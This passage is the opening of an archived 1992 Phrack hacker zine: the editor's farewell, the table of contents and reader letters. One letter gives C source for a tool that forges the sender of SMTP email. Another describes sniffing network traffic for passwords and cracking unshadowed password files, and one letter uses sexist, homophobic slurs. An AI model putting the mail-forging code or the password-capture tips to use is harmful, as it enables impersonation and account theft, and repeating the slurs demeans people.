home *** CD-ROM | disk | FTP | other *** search
/ Group 42-Sells Out! - The Information Archive / Group 42 Sells Out (Group 42) (1996).iso / zines / phrack / phrack41.txt < prev    next >
Text File  |  1995-11-30  |  357KB  |  7,196 lines

  1.  
  2.                                 ==Phrack Inc.==
  3.  
  4.                    Volume Four, Issue Forty-One, File 1 of 13
  5.  
  6.                                  Issue 41 Index
  7.                               ___________________
  8.  
  9.                                P H R A C K   4 1
  10.  
  11.                                December 31, 1992
  12.                               ___________________
  13.  
  14.                    ~ We've Had A Rest, We're Still The Best ~
  15.  
  16. You've been waiting for this for a while and it's finally here.  A lot has
  17. happened since the last issue.  I guess I should start off with the most
  18. important thing as far as the administration of Phrack is concerned:  Phrack 41
  19. is the last issue for which I will serve as editor.
  20.  
  21. Why?  Well for one, I was in a motorcycle wreck about a month ago and lost the
  22. use of my right arm for a while and, due to the related financial difficulties,
  23. I was forced to sell my computers and some other stuff.
  24.  
  25. Secondly, due to my lack of being a rich boy and having access to a nice
  26. machine, I found it necessary to allow others to help me in putting out the
  27. past several issues and that has resulted in some things being released that I
  28. really wasn't happy with.
  29.  
  30. However, don't get me wrong.  I'm not gonna sit here and dis my friends just
  31. because we differ in opinion about some things.  I think that the overall
  32. quality of the issues has been pretty good and anyone who says it's not can
  33. basically suck my dick, because I don't give a fuck about your opinion anyway.
  34.  
  35. Thirdly, and the most important reason why I am resigning as editor of Phrack,
  36. is a general lack of desire on my part.  I mean the whole reason I even got
  37. involved with doing this was because of hacking -- partly for curiosity and
  38. partly for being able to thumb my nose at the powers that be and other
  39. intellectual types that say, "You can't do/learn about that because we don't
  40. think blah blah blah."  Like I'm supposed to give a fuck what anyone else
  41. thinks.  The type of public service that I think hackers provide is not showing
  42. security holes to whomever has denied their existence, but to merely embarrass
  43. the hell out of those so-called computer security experts and other purveyors
  44. of snake oil.  This is a service that is truly unappreciated and is what keeps
  45. me motivated.  ANYWAY...if you wanna hear me rant some more, maybe I'll get to
  46. do my own Eleeeeet3 Pro-Phile in the future.  Heh!
  47.  
  48. But really, since my acquisition of Phrack, my play time has been hampered and
  49. consequently, I have started to become bored with it.  It was great to meet a
  50. lot of cool people and I learned some things.  It's now time for me to go back
  51. to doing what I like best.  For anyone who's interested in corresponding, I'm
  52. focusing my time on radio communications, HAM radio, scanning, and cellular
  53. telephones.  If you are interested in talking about these things to me or
  54. whatever, feel free to write me at dispater@stormking.com.
  55.  
  56. Aside from all that, I feel that Phrack can be better.  That's why issue 42
  57. will have a new editor and administrative staff.  I'm not saying who, but you
  58. may be surprised.  NO, it's not KL or TK either.
  59.  
  60. And with that, I'm saying adios and, as Adam Grant said, "Don't get caught."
  61.  
  62. Now onto the issue:
  63.  
  64. In this issue's Loopback, Phrack responds to the numerous letters it has
  65. received over the past several months, including the return of Shit Kickin' Jim
  66. and a message from Rop, editor of Hack-Tic.
  67.  
  68. The Racketeer (Rack of The Hellfire Club) continues his Network Miscellany
  69. column with plenty of new information about fake mail.
  70.  
  71. Phrack Pro-Phile focuses on one of the hacking community's most mysterious
  72. figures:  Supernigger.  SN was somewhat involved with the infamous DPAK and has
  73. some words of wisdom to the eleets and other folks who enjoy boasting about
  74. their number of years in "the hacker scene."
  75.  
  76.                             DISPATER, Phrack Editor
  77.  
  78.  
  79.  
  80.       Editor-In-Chief : Dispater
  81.        Eleet Founders : Taran King and Knight Lightning
  82.  Technical Consultant : Mind Mage
  83.    Network Miscellany : The Racketeer [HFC]
  84.                  News : Datastream Cowboy
  85.               Make-up : Hair Club for Men
  86.           Photography : Restricted Data Transmissions
  87.             Publicity : AT&T, BellSouth, and the United States Secret Service
  88.     Creative Stimulus : Camel Cool, Jolt Cola, and Taco Bell
  89.         Other Helpers : Scott Simpson, Zibby, The Weazel, The Fed, El1teZ
  90.                         Everywhere.
  91.  
  92.  
  93.   "For the record, we're hackers who believe information should be free.  All
  94.    information.  The world is full of phunky electronic gadgets and networks
  95.         and we want to share our information with the hacker community."
  96.                         -- Restricted Data Transmissions
  97.  
  98.  
  99.                 "They are satisfying their own appetite to know
  100.                      something that is not theirs to know."
  101.                  -- Assistant District Attorney, Don Ingraham
  102.  
  103.  
  104.        "The notion that how things work is a big secret is simply wrong."
  105.                    -- Hacking/Cracking conference on The WELL
  106.  
  107.  
  108.  
  109.                                 -= Phrack 41 =-
  110.  
  111.  Table Of Contents
  112.  ~~~~~~~~~~~~~~~~~
  113.  1. Introduction by Dispater                                               07K
  114.  2. Phrack Loopback by Dispater and Mind Mage                              52K
  115.  3. Phrack Pro-Phile on Supernigger                                        10K
  116.  4. Network Miscellany by The Racketeer [HFC]                              35K
  117.  5. Pirates Cove by Rambone                                                32K
  118.  6  Hacking AT&T System 75 by Scott Simpson                                20K
  119.  7. How To Build a DMS-10 Switch by The Cavalier                           23K
  120.  8. TTY Spoofing by VaxBuster                                              20K
  121.  9. Security Shortcomings of AppleShare Networks by Bobby Zero             16K
  122. 10. Mall Cop Frequencies by Caligula XXI                                   11K
  123. 11. PWN/Part 1 by Datastream Cowboy                                        46K
  124. 12. PWN/Part 2 by Datastream Cowboy                                        49K
  125. 13. PWN/Part 3 by Datastream Cowboy                                        43K
  126.                                                                    Total: 364K
  127.  
  128.                               There is no America.
  129.                              There is no democracy.
  130.                       There is only IBM and ITT and AT&T.
  131.                                 -- Consolidated
  132. _______________________________________________________________________________
  133.  
  134.                                 ==Phrack Inc.==
  135.  
  136.                    Volume Four, Issue Forty-One, File 2 of 13
  137.  
  138.                           [-=:< Phrack Loopback >:=-]
  139.  
  140.                             By Dispater & Mind Mage
  141.  
  142.      Phrack Loopback is a forum for you, the reader, to ask questions, air
  143. problems, and talk about what ever topic you would like to discuss.  This is
  144. also the place Phrack Staff will make suggestions to you by reviewing various
  145. items of note; books, magazines, software, catalogs, hardware, etc.
  146.  
  147. In this issue:
  148.  
  149.      Comments on Phrack 40                        : Rop Gonggrijp
  150.      Fine Art of Telephony (re: Phrack 40)        : Inhuman
  151.      Question & Comment (BT Tymnet/AS400)         : Otto Synch
  152.      BT Tymnet article in Phrack 40               : Anonymous
  153.      Phrack fraud?                                : Doctor Pizz
  154.      Remarks & Warning!                           : Synaps/Clone1/Feyd
  155.      One Ron Hults (re: Phrack 38 Loopback)       : Ken Martin
  156.      Hacking In Czecho-Slovakia                   : Stalker
  157.      Phrack 40 is Sexist!                         : Ground Zero
  158.      Phrack 40 is Sexist!? (PC Phrack)            : Shit Kickin' Jim
  159.      Misunderstood Hackers Get No Respect         : The Cruiser
  160.      Hackers Should Land In Jail, Not In Press    : Alan Falk
  161.      Anonymous Usenet Posting?                    : Anonymous
  162.      Anonymous Mail Poster                        : Sir Hackalot
  163.      Phrack On The Move                           : Andy Panda-Bear
  164.      Computer Underground Publications Index      : Amadeus
  165.      Pirates v. AT&T: Posters                     : Legacy Irreverent
  166.      Ultrix 4.2 Bug                               : Krynn
  167.      PumpCon Hosed                                : Phil "The Outlander"
  168.      2600 Meeting Disrupted by Law Enforcement    : Emmanuel Goldstein
  169.      Two New Hardcovers                           : Alan J. Rothman
  170. _______________________________________________________________________________
  171.  
  172.  Letters to the Editors
  173.  ~~~~~~~~~~~~~~~~~~~~~~
  174. From: rop@hacktic.nl (Rop Gonggrijp) (Editor of Hack-Tic Magazine)
  175. Date: August 14, 1992
  176. Subject: Comments on Phrack 40
  177.  
  178. My compliments!  You've put out one of the best issues to date.  If you keep
  179. this up I'll have to get jealous!
  180.  
  181.      Rop Gonggrijp (rop@hacktic.nl)        Dangerous and capable of making
  182.      fax: +31 20 6900968                        considerable trouble.
  183.  
  184. ----------
  185.  
  186. From: Inhuman (Sysop of Pentavia BBS)
  187. Date: August 18, 1992
  188. Subject: Fine Art of Telephony
  189.  
  190. I just wanted to let you guys know that the article titled "The Fine Art of
  191. Telephony" was one of the best articles I've seen in Phrack in a long time.
  192.  
  193. I hope to see more information on switching and general telephony in the
  194. future.
  195.  
  196. Thanks,
  197.  
  198. Inhuman
  199.  
  200. ----------
  201.  
  202. Date: October 22, 1992
  203. From: Otto Synch
  204. Subject: Question & Comment
  205.  
  206. Hello,
  207.  
  208. Reading your (huge) Phrack issue #40, and noticing that you were accepting
  209. comments and questions, I decided to post mine.  First of all, please forgive
  210. the English.  I'm French and can't help it :-)
  211.  
  212. My comment:  When I saw in the index that this issue was dealing with BT
  213. Tymnet, I felt very happy because I was looking for such information.  And when
  214. I read it, I felt really disappointed.  Toucan Jones could have reduced his
  215. whole article with the following lines:
  216.  
  217. -> Find any Tymnet number.
  218. -> Dial and wait for the "Please log-in:" prompt.
  219. -> Log as user "help", no password required.
  220. -> Capture everything you want, it's free public information.
  221.  
  222. I must say I was a bit surprised to find this kind of article in a high-quality
  223. magazine such as yours...
  224.  
  225. My question:  I'm currently trying to find out everything about a neat AS/400
  226. I've "found," but I never saw any "hack report" on it.  Do you know if there
  227. are any available?
  228.  
  229. OK - Let's see if you answer.  We feel somewhat lonely here in the Old
  230. Continent...but Phrack is here to keep the challenge up!
  231.  
  232. Regards,
  233.  
  234.       >  Otto Sync  <
  235.  
  236. ----------
  237.  
  238. From: Anonymous
  239. Date: August 19, 1992
  240. Subject: BT Tymnet article in Phrack 40
  241.  
  242. Dear Phrack Staff,
  243.  
  244. The BT Tymnet article in the 40th issue of Phrack was totally lame.  I hate it
  245. when people enter Telenet or Tymnet's information facility and just buffer all
  246. the sh*t that's in there.  Then they have the audacity to slap their name on
  247. the data as if they had made a major network discovery.  That's so f*ck*ng
  248. lame!
  249.  
  250. Phrack should make a policy not to accept such lame sh*t for their fine
  251. magazine.  Is Phrack *that* desperate for articles?  Crap like commercial dial-
  252. up lists is about as lame as posting a few random pages from the front of the
  253. white pages.  The information is quickly outdated and easily available at any
  254. time to anyone.  You don't hack this sh*t.
  255.  
  256. Regards,
  257.  
  258. Anonymous (anonymous because I don't want to hear any lame flames)
  259.  
  260. [Editor's Response:  We agree that buffering some dialup list is not hacking,
  261.                      however, in this specific case, a decision was made that
  262.                      not everyone had ready access to the information or even
  263.                      knew of its existence.  Furthermore and more relevant to
  264.                      why the article appeared in Phrack, an article on Tymnet
  265.                      was appropriate when considering the recent events with
  266.                      the MOD case in New York.
  267.  
  268.                      In the future, you may ask that your letter be printed
  269.                      anonymously, but don't send us anonymous mail.]
  270.  
  271. ----------
  272.  
  273. From: Doctor Pizz
  274. Date: October 12, 1992
  275. Subject: Phrack fraud?
  276.  
  277. I recently received an ad from someone who was selling the full set of Phrack
  278. back issues for $100.00.  I do believe that this is a violation of your rights
  279. to Phrack, as he is obviously selling your work for profit!
  280.  
  281. The address I received to order these disks was:
  282.  
  283.      R.E. Jones
  284.      21067 Jones-Mill
  285.      Long Beach, MS   39560
  286.  
  287. It seems he is also selling the set of NIA files for $50, a set of "Hacking
  288. Programs" for $40, LOD Tech Journals for $25, and lots of viruses.  It sounds
  289. like some sort of copyright violation, or fraud, as he is selling public domain
  290. stuff for personal profit.  At least you should be aware of this.  Anyway, I
  291. look forward to receiving future volumes of Phrack!  Keep up the good work.
  292.  
  293. Good luck in stopping this guy!
  294.  
  295. Thank you,
  296.  
  297. --Doctor Pizz--
  298.  
  299. [Editor's Note: We look forward to hearing what our Phrack readers think about
  300.                 people selling hardcopies of Phrack for their own personal
  301.                 profit.]
  302.  
  303. ----------
  304.  
  305. From: Synaps a/k/a Clone1 a/k/a Feyd
  306. Date: September 2, 1992
  307. Subject: Remarks & Warning!
  308.  
  309. Hi,
  310.  
  311. I've been a regular reader of Phrack for two years now and I approve fully the
  312. way you continue Phrack.  It's really a wonderful magazine and if I can help
  313. its development in France, I'll do as much as I can!  Anyway, this is not
  314. really the goal of my letter and excuse me for my English, which isn't very
  315. good.
  316.  
  317. My remarks are about the way you distribute Phrack.  Sometimes, I don't receive
  318. it fully.  I know this is not your fault and I understand that (this net
  319. sometimes has some problems!).  But I think you could provide a mail server
  320. like NETSERV where we could get back issues by mail and just by MAIL (no FTP).
  321.  
  322. Some people (a lot in France) don't have any access to international FTP and
  323. there are no FTP sites in France which have ANY issues of Phrack.  I did use
  324. some LISTSERV mailers with the send/get facility.  Could you install it on your
  325.  LISTSERV?
  326.  
  327. My warning is about a "group" (I should say a pseudo-group) founded by Jean
  328. Bernard Condat and called CCCF.  In fact, the JBC have spread his name through
  329. the net to a lot of people in the Underground.  As the Underground place in
  330. France is weak (the D.S.T, anti-hacker staff is very active here and very
  331. efficient), people tend to trust JBC.  He seems (I said SEEMS) to have a good
  332. knowledge in computing, looks kind, and has a lot of resources.  The only
  333. problem is that he makes some "sting" (as you called it some years ago)
  334. operation and uses the information he spied to track hackers.  He organized a
  335. game last year which was "le prix du chaos" (the amount of chaos) where he
  336. asked hackers to prove their capabilities.
  337.  
  338. It was not the real goal of this challenge.  He used all the materials hackers
  339. send him to harass some people and now he "plays" with the normal police and
  340. the secret police (DST) and installs like a trade between himself and them.
  341. It's really scary for the hacking scene in France because a lot of people trust
  342. him (even the television which has no basis to prove if he is really a hacker
  343. as he claims to be or if he is a hacker-tracker as he IS!).  Journalists take
  344. him as a serious source for he says he leads a group of computer enthusiasts.
  345.  
  346. But we discovered that his group doesn't exist.  There is nobody in his group
  347. except his brother and some other weird people (2 or 3) whereas he says there
  348. is 73 people in his club/group.  You should spread this warning to everybody in
  349. the underground because we must show that "stings" are not only for USA!  I
  350. know he already has a database with a lot of information like addresses and
  351. other stuff like that about hackers and then he "plays" with those hackers.
  352.  
  353. Be very careful with this guy.  Too many trust him.  Now it's time to be
  354. "objective" about him and his group!
  355.  
  356. Thanks a lot and goodbye.
  357.  
  358.          Synaps a/k/a Clone1 a/k/a Feyd
  359.  
  360. ----------
  361.  
  362. From: Ken Martin <70712.760@compuserve.com>
  363. Date: November 17, 1992
  364. Subject: One Ron Hults...(Phrack 38 Loopback)
  365.  
  366. Dear Phrack Staff:
  367.  
  368. This letter is concerning the letter in the Phrack Loopback column (#38, April
  369. 20, 1992) written by one Ron Hults.  It suggests that all children should be
  370. disallowed access to a computer with a modem.
  371.  
  372. The news release to which it is attached attempts to put an idea in the
  373. reader's mind that everything out there (on bulletin boards) is bad.  Anyone
  374. who can read messages from "satanic cultists, pedophile, and rapists" can also
  375. read a typical disclaimer found on most bulletin boards which have adult
  376. material and communication areas available to their users, and should be able
  377. to tell the SysOp of a BBS how old he/she is.
  378.  
  379. A child who is intelligent enough to operate a computer and modem should also
  380. be able to decide what is appropriate for him/her to read, and should have the
  381. sense enough to avoid areas of the BBS that could lead to trouble, and not to
  382. give their address and home phone number to the Charles Manson idols.  (It is a
  383. fact that all adolescents have thoughts about sex; nothing can change that.
  384. The operator of a BBS also has the moral responsibility to keep little kids out
  385. of the XXX-Rated GIF downloading area.)
  386.  
  387. One problem with that is BBSes run by the underground type (hack/phreak, these
  388. usually consist of people from 15-30 years of age).  The operators of these let
  389. practically anyone into their system, from my experiences.  These types of
  390. BBSes often have credit card numbers, telephone calling card numbers, access
  391. codes to credit reporting services, etc., usually along with text-file
  392. documents about mischievous topics.  Mr. Hults makes no mention of these in his
  393. letter and press release.  It is my belief that these types of systems are the
  394. real problem.  The kids are fascinated that, all of a sudden, they know how to
  395. make explosives and can get lots of anything for free.
  396.  
  397. I believe that the parents of children should have the sense enough to watch
  398. what they are doing.  If they don't like the kind of information that they're
  399. getting or the kind of messages that they're sending to other users, then that
  400. is the time to restrict access to the modem.
  401.  
  402. I am fifteen years old, and I can say that I have gotten into more than my
  403. share of trouble with the law as a result of information that I have obtained
  404. from BBSes and public communications services like CompuServe.  The computer is
  405. a tool, and it always will be.  Whether it is put to good use or not depends on
  406. its user.  I have put my computer/modem to use in positive applications more
  407. than destructive ones.
  408.  
  409. I would like Mr. Hults to think about his little idea of banning children from
  410. modem use, and to think about the impact it would have on their education.
  411. Many schools use computers/modems in their science and English curriculums for
  412. research purposes.
  413.  
  414. Banning children from telecommunications is like taking away connection to the
  415. outside world and all forms of publication whatsoever when one takes a look
  416. around a large information service like CompuServe or GEnie, and sees all of
  417. the information that a service like this is capable of providing to this
  418. nation.
  419.  
  420. Thanks,
  421.  
  422. Ken Martin (70712.760@compuserve.com)
  423. a.k.a. Scorpion, The Omega Concern, Dr. Scott
  424.  
  425. ----------
  426.  
  427. From: Stalker
  428. Date: October 14, 1992
  429. Subject: Hacking In Czecho-Slovakia
  430.  
  431. Hi there!
  432.  
  433. I'm student from Czecho-Slovakia (for some stupid person who doesn't know, it's
  434. in middle Europe).  Call me Stalker (if there is other guy with this name, call
  435. me what you want).  If you think that computers, networks, hacking and other
  436. interesting things are not in Eastern Europe, you're WRONG.  I won't talk
  437. about politicians. They really make me (and other men from computers) sick!
  438. I'll tell you what is interesting here right now.
  439.  
  440. Our university campus is based on two main systems, VMS and ULTRIX.  There's
  441. VAX 6000, VAX 4000, MicroVAX, VAXStation and some oldtimer machines which run
  442. under VMS.  As for hacking, there's nothing interesting.  You can't do some
  443. tricks with /etc/passwd, there's no main bug in utilities and commands.  But,
  444. as I know, VMS doesn't crypt the packets across the network so you can take
  445. some PC and Netwatch (or any other useful software ) and try to see what
  446. is interesting on the cable.  You can grab anything that you want (usernames,
  447. passwords, etc.).
  448.  
  449. Generally, students hate VMS and love UNIX-like systems.  Other machines are
  450. based on ULTRIX.  We have DECstations (some 3100, some 5000) and one SM 52-12
  451. which is something on VAX-11 :-(.  It is a really slow machine, but it has
  452. Internet access!  There's many users so you can relatively easily run Crack
  453. (excellent program) since passwd is not shadowed.  Another useful thing is tftp
  454. (see some other Crack issues).  There was a machine with enabled tftp, but
  455. after one incident, it was disabled.
  456.  
  457. I would like to tell you more about this incident but sysadmins are still
  458. suspecting (they probably read my mail).  Maybe after some months in other
  459. articles.  Now I can tell you that I'm not a real UNIX-GURU-HACKER, but the
  460. sysadmins thought that I was.  Someone (man or girl, who knows) has hacked one
  461. (or two) machines on our campus.  Administrators thought that I was this
  462. mysterious hacker but I am not!  He/she is much better than I and my friends.
  463. Today no one knows who the hacker is.  The administrator had talked to him/her
  464. and after some weeks, gave him/her an account.  He/she probably had root
  465. privileges for some time and maybe has these today.  He/she uses a modem to
  466. connect.  His/her login name is nemo (Jules Verne is a popular hero).  I will
  467. try to send mail to him/her about Phrack and maybe he/she will write
  468. interesting articles about himself.
  469.  
  470. And some tips.  Phrack is very interesting, but there's other interesting
  471. official files on cert.org (192.88.209.9) available via anonymous FTP.  This
  472. is the Computer Emergency Response Team (CERT) FTP server.  You can find
  473. interesting information here about bugs in actual software, but you will see
  474. only which command or utility has the bug, not how to exploit it.  If you are
  475. smart enough, there's nothing to say.
  476.  
  477. If you are not, you must read Phrack!  :-)
  478.  
  479. Bye,
  480.  
  481. Stalker
  482.  
  483. ----------
  484.  
  485. From: Ground Zero
  486. Date: August 25, 1992
  487. Subject: Phrack 40 is Sexist!
  488.  
  489. Hi, just a quick comment about Phrack's account of SummerCon:
  490.  
  491. I don't think your readers need to know or are really interested in hearing
  492. about the fact that Doc Holiday was busy trying to pick up girls or that there
  493. were some unbalanced teeny-boppers there offering themselves to some of the
  494. SummerCon participants.  Also, as a woman I don't care for your
  495. characterizations of females in that file.
  496.  
  497. I'm not trying to nitpick or be politically correct (I hate PC), I'm just
  498. writing because I felt strongly enough about it.  Ciao.
  499.  
  500. Ground Zero (Editor of Activist Times, Inc./ATI)
  501.  
  502. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  503.  
  504. From: Shit Kickin' Jim
  505. Date: September 11, 1992
  506. Subject: Phrack 40 is Sexist!? (PC Phrack)
  507.  
  508. Listen here woman.  I don't know whut yer big fat butt thinks Phrack wuz tryin'
  509. to insinuate.  Lemme tell yew a thang er two.  First of all, Phrack ain't run
  510. by some little pip-squeek faggot ass pansies.  Ah mean wut are you sum kinda
  511. hOmOsexual?  Here's what ah mean.  NOW here iz a real story 'bout me and one a
  512. my bestest friends: 4x4 Phreaker.
  513.  
  514. See 4x4 Phreaker come down to Texas fur a little hackin adventure.  Even though
  515. he lives up there in Yankee-land, 4x4 Phreaker iz a pretty good ol' boy.
  516. Whuddya think real manly hackers do when they get together?  Go stop by Radio
  517. Shack and buy shrink wrap?
  518.  
  519. HELL NO!  We fuckin' went to Caligula XXI.  Fur yew ol' boys that ain't from
  520. 'round here er yer a fauygut out there that might be readin this, Caligula XXI
  521. specializes in enertainmunt fer gennelmen.
  522.  
  523. Now, me and 4x4 Phreaker didn't go to hawk at some fat nasty sluts like you
  524. might see at your typical Ho-Ho Con.  We went with the purpose in mind of seein
  525. a real movie star.  Yup Christy Canyon was in the house that night.  4x4
  526. Phreaker and me sat down at a table near the front.  At that point I decided
  527. that I'd start trollin for babes.  Yep that's right I whipped out an American
  528. Express Corporate Gold card.  And I'll be damned if it weren't 3 minutes later
  529. me and 4x4 Phreaker had us 2 new found friends for the evening.
  530.  
  531. So anywayz, yew can see we treated these two fine ladies real nice and they
  532. returned the favor.  We even took em to Waffle House the next mornin'.  So I
  533. dunno where yew git off by callin us sexist.  Yer just some Yankee snob big
  534. city high horse woman who expects to be a takin care of.
  535.  
  536. God bless George Bush and his mistress Jennifer whutz her name.
  537.  
  538. :Shit Kickin' Jim (Madder than a bramer bull fightin a mess of wet hornets)
  539.  
  540. _______________________________________________________________________________
  541.  
  542.  Misunderstood Hackers Get No Respect                           August 10, 1992
  543.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  544.  by The Cruiser (ComputerWorld)(Page 24)(Letters to the Editor)
  545.  
  546. I just read the replies to Chris Goggans' "Hackers aren't the real enemy"
  547. [ComputerWorld, June 29], and I thought I'd address a few of the points brought
  548. up.  I'm a hacker -- which means that I'm every system administrator's
  549. nightmare.
  550.  
  551. Hardly.  Many hackers are politically aware activists.  Besides being fueled by
  552. an obsession for mastering technology (I call it a blatant disregard for such),
  553. true hackers live and obey a strict moral code.
  554.  
  555. All this talk about the differences between voyeurism and crime:  Please, let's
  556. stop comparing information access to breaking into someone's house.  The
  557. government can seize computers and equipment from suspected hackers, never to
  558. return it, without even charging a crime.  I will not sit back and let Big
  559. Brother control me.
  560.  
  561. The Cruiser
  562. _______________________________________________________________________________
  563.  
  564.  Hackers Should Land In Jail, Not In Press                     October 19, 1992
  565.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  566.  by Alan Falk (ComputerWorld)(Page 32)(Letters to the Editor)
  567.  
  568. The letters you get from avowed hackers seem to glorify the virtues of hacking.
  569. I find this very disturbing for a simple reason:  It completely ignores the
  570. issue of private property.
  571.  
  572. The computer systems they hack into (pun intended) and the databases they try
  573. to access, as well as the data in the databases, are private property.
  574.  
  575. An analogous argument might be that breaking and entering a jewelry store and
  576. taking off with some valuables is really a way of testing the security controls
  577. at the jeweler's establishment.  They're really just doing it for the
  578. excitement and challenge.
  579. Would they promote voyeurism based on the "logic" that "after all, if they
  580. didn't want me to look, they'd have pulled the drapes closer together?"
  581.  
  582. The fact that there's challenge or excitement involved (or even commitment,
  583. intellect or whatever) does not change the issue.
  584.  
  585. I suggest that hackers who gain entry to systems against the wishes of the
  586. systems' owners should be treated according to the laws regarding unlawful
  587. entry, theft, etc.
  588.  
  589. Alan Falk
  590. Cupertino, California
  591. _______________________________________________________________________________
  592.  
  593.  Anonymous Usenet Posting?
  594.  ~~~~~~~~~~~~~~~~~~~~~~~~~
  595. Date: August 19, 1992
  596. From: Anonymous
  597.  
  598. I've read in Phrack all about the different ways to send fake mail, but do any
  599. of the readers (or Mind Mage) know anything about anonymous newsgroup posting?
  600.  
  601. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  602.  
  603.  Anonymous Mail Poster                                           August 4, 1992
  604.  ~~~~~~~~~~~~~~~~~~~~~
  605.  by Sir Hackalot
  606.  
  607. Here is some C source to a simple "anonymous" mail poster that I wrote a LONG
  608. time ago.  It's just one of many pieces of code I never gave to anyone before.
  609. You may find it useful.  Basically, it will connect to the SMTP port and
  610. automate the sending.  It will allow for multiple recipients on the "To:" line,
  611. and multiple "To:" lines.
  612.  
  613. From: sirh@sirh.com
  614.  
  615. ------ Cut here for fm.c -----
  616. #include <stdio.h>
  617. #include <string.h>
  618. #include <sys/types.h>
  619. #include <sys/socket.h>
  620. #include <netdb.h>
  621. #include <netinet/in.h>
  622. #include <arpa/inet.h>
  623. #include <signal.h>
  624. #include <fcntl.h>
  625. #include <errno.h>
  626.  
  627.  
  628. int openSock(name,port)
  629. char *name;
  630. int port;
  631.  
  632. {
  633.       int mysock,opt=1;
  634.       struct sockaddr_in sin;
  635.       struct hostent *he;
  636.       he = gethostbyname(name);
  637.       if (he == NULL) {
  638.             printf("No host found..\n");
  639.             exit(0);
  640.       }
  641.  
  642.       memcpy((caddr_t)&sin.sin_addr,he->h_addr_list[0],he->h_length);
  643.       sin.sin_port = port;
  644.  
  645.       sin.sin_family = AF_INET;
  646.  
  647.       mysock = socket(AF_INET,SOCK_STREAM,0);
  648.  
  649.       opt = connect(mysock,(struct sockaddr *)&sin,sizeof(sin));
  650.  
  651.       return mysock;
  652.  
  653. }
  654.  
  655. /* This allows us to have many people on one TO line, seperated by
  656.    commas or spaces. */
  657.  
  658. process(s,d)
  659. int d;
  660. char *s;
  661. {
  662.       char *tmp;
  663.       char buf[120];
  664.  
  665.       tmp = strtok(s," ,");
  666.  
  667.       while (tmp != NULL) {
  668.             sprintf(buf,"RCPT TO: %s\n",tmp);
  669.             write(d,buf,strlen(buf));
  670.             tmp = strtok(NULL," ,");
  671.       }
  672.  
  673. }
  674.  
  675.  
  676.  
  677. getAndSendFrom(fd)
  678. int fd;
  679. {
  680.       char from[100];
  681.       char outbound[200];
  682.  
  683.       printf("You must should specify a From address now.\nFrom: ");
  684.       gets(from);
  685.  
  686.       sprintf(outbound,"MAIL FROM: %s\n",from);
  687.       write(fd,outbound,strlen(outbound));
  688.  
  689.  
  690.  
  691. }
  692.  
  693. getAndSendTo(fd)
  694. int fd;
  695. {
  696.       char addrs[100];
  697.  
  698.       printf("Enter Recipients, with a blank line to end.\n");
  699.  
  700.       addrs[0] = '_';
  701.  
  702.       while (addrs[0] != '\0') {
  703.             printf("To: ");
  704.             gets(addrs);
  705.             process(addrs,fd);
  706.       }
  707.  
  708. }
  709.  
  710. getAndSendMsg(fd)
  711. int fd;
  712. {
  713.       char textline[90];
  714.       char outbound[103];
  715.  
  716.       sprintf(textline,"DATA\n");
  717.       write(fd,textline,strlen(textline));
  718.  
  719.  
  720.       printf("You may now enter your message.  End with a period\n\n");
  721.       printf("[---------------------------------------------------------]\n");
  722.  
  723.       textline[0] = '_';
  724.  
  725.       while (textline[0] != '.') {
  726.             gets(textline);
  727.             sprintf(outbound,"%s\n",textline);
  728.             write(fd,outbound,strlen(outbound));
  729.       }
  730.  
  731. }
  732.  
  733.  
  734. main(argc,argv)
  735. int argc;
  736. char *argv[];
  737. {
  738.  
  739.       char text[200];
  740.       int file_d;
  741.  
  742.       /* Get ready to connect to host. */
  743.       printf("SMTP Host: ");
  744.       gets(text);
  745.  
  746.       /* Connect to standard SMTP port. */
  747.       file_d = openSock(text,25);
  748.  
  749.       if (file_d < 0) {
  750.             printf("Error connecting to SMTP host.\n");
  751.             perror("smtp_connect");
  752.             exit(0);
  753.       }
  754.  
  755.       printf("\n\n[+ Connected to SMTP host %s +]\n",text);
  756.  
  757.       sleep(1);
  758.  
  759.       getAndSendFrom(file_d);
  760.  
  761.       getAndSendTo(file_d);
  762.  
  763.       getAndSendMsg(file_d);
  764.  
  765.       sprintf(text,"QUIT\n");
  766.       write(file_d,text,strlen(text));
  767.  
  768.     /* Here we just print out all the text we got from the SMTP
  769.        Host.  Since this is a simple program, we didnt need to do
  770.        anything with it. */
  771.  
  772.     printf("[Session Message dump]:\n");
  773.       while(read(file_d,text,78) > 0)
  774.             printf("%s\n",text);
  775.       close(file_d);
  776. }
  777. ----- End file fm.c
  778. _______________________________________________________________________________
  779.  
  780. From: Andy Panda-Bear
  781. Date: September 25, 1992
  782. Subject: Phrack on the move
  783.  
  784. To Whom It May Concern:
  785.  
  786. I love reading your Phrack articles and find them very, very informative as
  787. well as helpful.  I was wondering in you've ever or plan to put together a
  788. compendium of related articles.  For instance, you could make a Phrack guide to
  789. telephony and include all telephone/telecommunications articles.  Perhaps a
  790. "Phrack Guide to UNIX" or "Phrack Guide to Internet" could be produced.  It
  791. could have reprints of past articles along with commentaries by individuals who
  792. care to share their knowledge.  Anyway it's just something to think about.
  793.  
  794. Thanks for many megabytes of useful info and keep it coming.
  795.  
  796.       Later,
  797.  
  798.       Andy Panda-Bear
  799.  
  800. ----------
  801.  
  802.  Computer Underground Publications Index
  803.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  804.  by Amadeus
  805.  
  806. I just finished the new edition of the Phrack Index, now called the Computer
  807. Underground Publications Index since it now includes the issues of the Legion
  808. of Doom Tech Journals and Informatik.
  809.  
  810. You can get it from ftp.uu.net as /tmp/CUPindex
  811.  
  812. I have already sent it to da folks at CUD so that they may enter it into their
  813. archives.
  814.  
  815. The CUP has been updated to included all the Phracks up to 40.
  816.  
  817. C'ya
  818.  
  819. Amadeus
  820. _______________________________________________________________________________
  821.  
  822.  Pirates v. AT&T: Posters                                        August 8, 1992
  823.  ~~~~~~~~~~~~~~~~~~~~~~~~
  824.  by Legacy Irreverent (legacy@cpu.cyberpnk1.sai.com)
  825.  
  826. On May 24 1992, two lone Pirates, Legacy of CyberPunk System, and Captain
  827. Picard of Holodeck, had finally had enough of AT&T.  Together, they traveled to
  828. the AT&T Maintenance Facility, just west of Goddard, Kansas, and claimed the
  829. property in the name of Pirates and Hackers everywhere.  They hoisted the Jolly
  830. Roger skull and crossbones high on the AT&T flagpole, where it stayed for 2
  831. days until it was taken down by security.
  832.  
